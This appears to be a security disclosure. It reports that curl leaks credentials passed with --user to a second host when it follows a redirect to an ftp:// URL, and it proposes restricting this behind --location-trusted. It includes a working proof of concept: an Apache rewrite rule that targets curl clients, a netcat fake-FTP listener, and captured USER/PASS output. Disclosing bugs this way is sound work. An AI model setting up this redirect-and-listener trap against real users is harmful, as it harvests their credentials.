curl can be coaxed into leaking user credentials to a third-party host by issuing an HTTP redirect to an ftp:// URL.
On firstsite.tld, configure Apache to perform the redirect with mod_rewrite:

```apache
# only redirect requests whose User-Agent starts with "curl/"
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
On secondsite.tld, run a minimal fake FTP server that greets the client, asks for a password and then closes the connection, for example with:

```sh
while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
```

Then, on the client:

```sh
curl -L --user foo https://firstsite.tld/redirectpoc
```

The listener on secondsite.tld receives the credentials:

```
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
```
There are several issues here (firstsite.tld vs secondsite.tld). This is definitely not what the user could expect, considering the documentation says:

I believe the credentials should not be sent in this case unless --location-trusted is used.
It might even be sensible to consider making curl stop sending credentials over downgraded security by default even when --location-trusted is used. Maybe there could be some option that could be used to enable such a downgrade if the user REALLY wants it.
Leak of confidential information (user credentials).